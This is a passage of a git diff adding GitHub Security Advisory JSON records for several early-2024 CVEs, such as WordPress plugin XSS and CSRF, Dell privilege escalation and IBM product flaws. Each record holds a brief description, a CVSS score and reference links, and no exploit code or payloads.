"2024-02-07T18:30:27Z", + "aliases": [ + "CVE-2024-23806" + ], + "details": "\n\n\nSensitive data can be extracted from HID iCLASS SE reader configuration cards. This could include credential and device administrator keys.\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23806" + }, + { + "type": "WEB", + "url": "https://https://www.cisa.gov/news-events/ics-advisories/icsa-24-037-02" + }, + { + "type": "WEB", + "url": "https://www.hidglobal.com/support" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T17:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-whvw-59jf-hrx9/GHSA-whvw-59jf-hrx9.json b/advisories/unreviewed/2024/02/GHSA-whvw-59jf-hrx9/GHSA-whvw-59jf-hrx9.json new file mode 100644 index 0000000000000..7a6d766a2fabc --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-whvw-59jf-hrx9/GHSA-whvw-59jf-hrx9.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-whvw-59jf-hrx9", + "modified": "2024-02-06T09:31:38Z", + "published": "2024-02-06T09:31:38Z", + "aliases": [ + "CVE-2023-32479" + ], + "details": "\nDell Encryption, Dell Endpoint Security Suite Enterprise, and Dell Security Management Server versions prior to 11.9.0 contain privilege escalation vulnerability due to improper ACL of the non-default installation directory. A local malicious user could potentially exploit this vulnerability by replacing binaries in installed directory and taking reverse shell of the system leading to Privilege Escalation.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32479" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000215881/dsa-2023-260" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T08:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-wj7p-x86m-qmwx/GHSA-wj7p-x86m-qmwx.json b/advisories/unreviewed/2024/02/GHSA-wj7p-x86m-qmwx/GHSA-wj7p-x86m-qmwx.json new file mode 100644 index 0000000000000..ee0d5946f61b9 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-wj7p-x86m-qmwx/GHSA-wj7p-x86m-qmwx.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wj7p-x86m-qmwx", + "modified": "2024-02-06T18:30:20Z", + "published": "2024-02-01T12:30:22Z", + "aliases": [ + "CVE-2023-51534" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Brave Brave – Create Popup, Optins, Lead Generation, Survey, Sticky Elements & Interactive Content allows Stored XSS.This issue affects Brave – Create Popup, Optins, Lead Generation, Survey, Sticky Elements & Interactive Content: from n/a through 0.6.2.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51534" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/brave-popup-builder/wordpress-brave-popup-plugin-0-6-2-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T11:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-wj9m-8xm4-fx2j/GHSA-wj9m-8xm4-fx2j.json b/advisories/unreviewed/2024/02/GHSA-wj9m-8xm4-fx2j/GHSA-wj9m-8xm4-fx2j.json new file mode 100644 index 0000000000000..3eb1cecfe3318 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-wj9m-8xm4-fx2j/GHSA-wj9m-8xm4-fx2j.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wj9m-8xm4-fx2j", + "modified": "2024-02-03T09:30:18Z", + "published": "2024-02-03T09:30:18Z", + "aliases": [ + "CVE-2023-43183" + ], + "details": "Incorrect access control in Reprise License Management Software Reprise License Manager v15.1 allows read-only users to arbitrarily change the password of an admin and hijack their account.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43183" + }, + { + "type": "WEB", + "url": "https://packetstormsecurity.com/files/176841/Reprise-License-Manager-15.1-Privilege-Escalation-File-Write.html" + }, + { + "type": "WEB", + "url": "http://seclists.org/fulldisclosure/2024/Jan/43" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-03T09:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-wp72-v8x4-g8h9/GHSA-wp72-v8x4-g8h9.json b/advisories/unreviewed/2024/02/GHSA-wp72-v8x4-g8h9/GHSA-wp72-v8x4-g8h9.json new file mode 100644 index 0000000000000..b6aa3eb3fadc7 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-wp72-v8x4-g8h9/GHSA-wp72-v8x4-g8h9.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wp72-v8x4-g8h9", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0374" + ], + "details": "The Views for WPForms – Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.2. This is due to missing or incorrect nonce validation on the 'create_view' function. This makes it possible for unauthenticated attackers to create views via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0374" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/34c0c676-37f9-49f2-ad50-2d70831fda53?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-wpw2-f6x3-8f7j/GHSA-wpw2-f6x3-8f7j.json b/advisories/unreviewed/2024/02/GHSA-wpw2-f6x3-8f7j/GHSA-wpw2-f6x3-8f7j.json new file mode 100644 index 0000000000000..59992d2cd4649 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-wpw2-f6x3-8f7j/GHSA-wpw2-f6x3-8f7j.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wpw2-f6x3-8f7j", + "modified": "2024-02-05T06:30:29Z", + "published": "2024-02-05T06:30:29Z", + "aliases": [ + "CVE-2023-5677" + ], + "details": "Brandon\nRothel from QED Secure Solutions has found that the VAPIX API tcptest.cgi\ndid not have a sufficient input validation allowing for a possible remote code\nexecution. This flaw can only be exploited after authenticating with an\noperator- or administrator-privileged service account. The impact of exploiting\nthis vulnerability is lower with operator-privileges compared to\nadministrator-privileges service accounts. Axis has released patched AXIS OS\nversions for the highlighted flaw. Please refer to the Axis security advisory\nfor more information and solution. \n\n\n\n\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5677" + }, + { + "type": "WEB", + "url": "https://www.axis.com/dam/public/a9/dd/f1/cve-2023-5677-en-US-424335.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T06:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-wrq2-h2ff-mxv5/GHSA-wrq2-h2ff-mxv5.json b/advisories/unreviewed/2024/02/GHSA-wrq2-h2ff-mxv5/GHSA-wrq2-h2ff-mxv5.json new file mode 100644 index 0000000000000..c496f84c82671 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-wrq2-h2ff-mxv5/GHSA-wrq2-h2ff-mxv5.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wrq2-h2ff-mxv5", + "modified": "2024-02-01T12:30:22Z", + "published": "2024-02-01T12:30:22Z", + "aliases": [ + "CVE-2024-22148" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Smart Editor JoomUnited allows Reflected XSS.This issue affects JoomUnited: from n/a through 1.3.3.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22148" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/wp-smart-editor/wordpress-wp-smart-editor-plugin-1-3-3-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T10:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-wwpc-m88m-frjm/GHSA-wwpc-m88m-frjm.json b/advisories/unreviewed/2024/02/GHSA-wwpc-m88m-frjm/GHSA-wwpc-m88m-frjm.json new file mode 100644 index 0000000000000..4aea39746667a --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-wwpc-m88m-frjm/GHSA-wwpc-m88m-frjm.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wwpc-m88m-frjm", + "modified": "2024-02-03T03:30:27Z", + "published": "2024-02-03T03:30:27Z", + "aliases": [ + "CVE-2023-30999" + ], + "details": "IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow an attacker to cause a denial of service due to uncontrolled resource consumption. IBM X-Force ID: 254651.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-30999" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/254651" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7106586" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-03T01:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-wx33-9hcf-h8wc/GHSA-wx33-9hcf-h8wc.json b/advisories/unreviewed/2024/02/GHSA-wx33-9hcf-h8wc/GHSA-wx33-9hcf-h8wc.json new file mode 100644 index 0000000000000..8c0b5290d02b5 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-wx33-9hcf-h8wc/GHSA-wx33-9hcf-h8wc.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wx33-9hcf-h8wc", + "modified": "2024-02-02T06:30:31Z", + "published": "2024-02-02T06:30:31Z", + "aliases": [ + "CVE-2023-38020" + ], + "details": "IBM SOAR QRadar Plugin App 1.0 through 5.0.3 could allow an authenticated user to manipulate output written to log files. IBM X-Force ID: 260576.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38020" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/260576" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7111679" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-117" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T04:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-wxfh-8hrr-vfjw/GHSA-wxfh-8hrr-vfjw.json b/advisories/unreviewed/2024/02/GHSA-wxfh-8hrr-vfjw/GHSA-wxfh-8hrr-vfjw.json new file mode 100644 index 0000000000000..aa87297079bcd --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-wxfh-8hrr-vfjw/GHSA-wxfh-8hrr-vfjw.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wxfh-8hrr-vfjw", + "modified": "2024-02-08T18:30:39Z", + "published": "2024-02-02T12:30:30Z", + "aliases": [ + "CVE-2024-0844" + ], + "details": "The Popup More Popups, Lightboxes, and more popup modules plugin for WordPress is vulnerable to Local File Inclusion in version 2.1.6 via the ycfChangeElementData() function. This makes it possible for authenticated attackers, with administrator-level access and above, to include and execute arbitrary files ending with \"Form.php\" on the server , allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0844" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/popup-more/trunk/classes/Ajax.php#L184" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7894a19c-b873-4c5b-8c82-6656cc306ee2?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T12:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-wxhv-5vpx-mrm3/GHSA-wxhv-5vpx-mrm3.json b/advisories/unreviewed/2024/02/GHSA-wxhv-5vpx-mrm3/GHSA-wxhv-5vpx-mrm3.json new file mode 100644 index 0000000000000..16d0e14268eed --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-wxhv-5vpx-mrm3/GHSA-wxhv-5vpx-mrm3.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wxhv-5vpx-mrm3", + "modified": "2024-02-02T03:30:32Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2023-50941" + ], + "details": "IBM PowerSC 1.3, 2.0, and 2.1 does not provide logout functionality, which could allow an authenticated user to gain access to an unauthorized user using session fixation. IBM X-Force ID: 275131.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50941" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/275131" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7113759" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-384" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T02:15:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-x2cq-3g4m-wg8x/GHSA-x2cq-3g4m-wg8x.json b/advisories/unreviewed/2024/02/GHSA-x2cq-3g4m-wg8x/GHSA-x2cq-3g4m-wg8x.json new file mode 100644 index 0000000000000..3fbda7498caee --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-x2cq-3g4m-wg8x/GHSA-x2cq-3g4m-wg8x.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x2cq-3g4m-wg8x", + "modified": "2024-02-06T00:30:28Z", + "published": "2024-02-06T00:30:28Z", + "aliases": [ + "CVE-2024-1209" + ], + "details": "The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1209" + }, + { + "type": "WEB", + "url": "https://github.com/karlemilnikka/CVE-2024-1209" + }, + { + "type": "WEB", + "url": "https://www.learndash.com/release-notes/" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7191955e-0db1-4ad1-878b-74f90ca59c91?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-x2h7-3cpj-7r74/GHSA-x2h7-3cpj-7r74.json b/advisories/unreviewed/2024/02/GHSA-x2h7-3cpj-7r74/GHSA-x2h7-3cpj-7r74.json new file mode 100644 index 0000000000000..f01eaa844d3f0 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-x2h7-3cpj-7r74/GHSA-x2h7-3cpj-7r74.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x2h7-3cpj-7r74", + "modified": "2024-02-02T21:31:29Z", + "published": "2024-02-02T21:31:29Z", + "aliases": [ + "CVE-2024-1193" + ], + "details": "A vulnerability was found in Navicat 12.0.29. It has been rated as problematic. This issue affects some unknown processing of the component MySQL Conecction Handler. The manipulation leads to denial of service. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252683. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1193" + }, + { + "type": "WEB", + "url": "https://fitoxs.com/vuldb/24-exploit-perl.txt" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252683" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252683" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-404" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T21:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-x379-72wq-8vwf/GHSA-x379-72wq-8vwf.json b/advisories/unreviewed/2024/02/GHSA-x379-72wq-8vwf/GHSA-x379-72wq-8vwf.json new file mode 100644 index 0000000000000..b6188d8f3ccb3 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-x379-72wq-8vwf/GHSA-x379-72wq-8vwf.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x379-72wq-8vwf", + "modified": "2024-02-06T09:31:38Z", + "published": "2024-02-06T09:31:38Z", + "aliases": [ + "CVE-2023-28063" + ], + "details": "\nDell BIOS contains a Signed to Unsigned Conversion Error vulnerability. A local authenticated malicious user with admin privileges could potentially exploit this vulnerability, leading to denial of service.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28063" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000214780/dsa-2023-176-dell-client-bios-security-update-for-a-signed-to-unsigned-conversion-error-vulnerability" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-195" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T08:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-x3vr-472g-gmxm/GHSA-x3vr-472g-gmxm.json b/advisories/unreviewed/2024/02/GHSA-x3vr-472g-gmxm/GHSA-x3vr-472g-gmxm.json new file mode 100644 index 0000000000000..ceec251fc822e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-x3vr-472g-gmxm/GHSA-x3vr-472g-gmxm.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x3vr-472g-gmxm", + "modified": "2024-02-07T18:30:27Z", + "published": "2024-02-07T18:30:27Z", + "aliases": [ + "CVE-2023-43017" + ], + "details": "IBM Security Verify Access 10.0.0.0 through 10.0.6.1 could allow a privileged user to install a configuration file that could allow remote access. IBM X-Force ID: 266155.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43017" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/266155" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7106586" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T17:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-x4hh-7hpg-jmcg/GHSA-x4hh-7hpg-jmcg.json b/advisories/unreviewed/2024/02/GHSA-x4hh-7hpg-jmcg/GHSA-x4hh-7hpg-jmcg.json new file mode 100644 index 0000000000000..99a6b5475a435 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-x4hh-7hpg-jmcg/GHSA-x4hh-7hpg-jmcg.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x4hh-7hpg-jmcg", + "modified": "2024-02-02T03:30:32Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2024-22319" + ], + "details": "IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote attacker to conduct an LDAP injection. By sending a request with a specially crafted request, an attacker could exploit this vulnerability to inject unsanitized content into the LDAP filter. IBM X-Force ID: 279145.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22319" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/279145" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7112382" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74", + "CWE-90" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T03:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-x547-pm2q-2cr6/GHSA-x547-pm2q-2cr6.json b/advisories/unreviewed/2024/02/GHSA-x547-pm2q-2cr6/GHSA-x547-pm2q-2cr6.json new file mode 100644 index 0000000000000..28c3a2be44f0f --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-x547-pm2q-2cr6/GHSA-x547-pm2q-2cr6.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x547-pm2q-2cr6", + "modified": "2024-02-06T03:32:59Z", + "published": "2024-02-06T03:32:59Z", + "aliases": [ + "CVE-2023-46360" + ], + "details": "Hardy Barth cPH2 eCharge Ladestation v1.87.0 and earlier is vulnerable to Execution with Unnecessary Privileges.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46360" + }, + { + "type": "WEB", + "url": "https://www.offensity.com/en/blog/os-command-injection-in-cph2-charging-station-200-cve-2023-46359-and-cve-2023-46360/" + }, + { + "type": "WEB", + "url": "http://hardy.com" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T01:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-x5c7-28cx-8rh5/GHSA-x5c7-28cx-8rh5.json b/advisories/unreviewed/2024/02/GHSA-x5c7-28cx-8rh5/GHSA-x5c7-28cx-8rh5.json new file mode 100644 index 0000000000000..138b5ac79b893 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-x5c7-28cx-8rh5/GHSA-x5c7-28cx-8rh5.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x5c7-28cx-8rh5", + "modified": "2024-02-02T00:31:27Z", + "published": "2024-02-02T00:31:27Z", + "aliases": [ + "CVE-2023-36496" + ], + "details": "Delegated Admin Privilege virtual attribute provider plugin, when enabled, allows an authenticated user to elevate their permissions in the Directory Server.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:H/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-36496" + }, + { + "type": "WEB", + "url": "https://docs.pingidentity.com/r/en-us/pingdirectory-93/ynf1693338390284" + }, + { + "type": "WEB", + "url": "https://support.pingidentity.com/s/article/SECADV039" + }, + { + "type": "WEB", + "url": "https://www.pingidentity.com/en/resources/downloads/pingdirectory-downloads.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T23:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-x5rp-83c9-9fm7/GHSA-x5rp-83c9-9fm7.json b/advisories/unreviewed/2024/02/GHSA-x5rp-83c9-9fm7/GHSA-x5rp-83c9-9fm7.json new file mode 100644 index 0000000000000..e04474425b02c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-x5rp-83c9-9fm7/GHSA-x5rp-83c9-9fm7.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x5rp-83c9-9fm7", + "modified": "2024-02-01T12:30:23Z", + "published": "2024-02-01T12:30:23Z", + "aliases": [ + "CVE-2023-51685" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LJ Apps WP Review Slider allows Stored XSS.This issue affects WP Review Slider: from n/a through 12.7.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51685" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/wp-facebook-reviews/wordpress-wp-review-slider-plugin-12-7-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T11:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-x62r-6wv3-49pm/GHSA-x62r-6wv3-49pm.json b/advisories/unreviewed/2024/02/GHSA-x62r-6wv3-49pm/GHSA-x62r-6wv3-49pm.json new file mode 100644 index 0000000000000..64ea4cdf40e3e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-x62r-6wv3-49pm/GHSA-x62r-6wv3-49pm.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x62r-6wv3-49pm", + "modified": "2024-02-02T00:31:25Z", + "published": 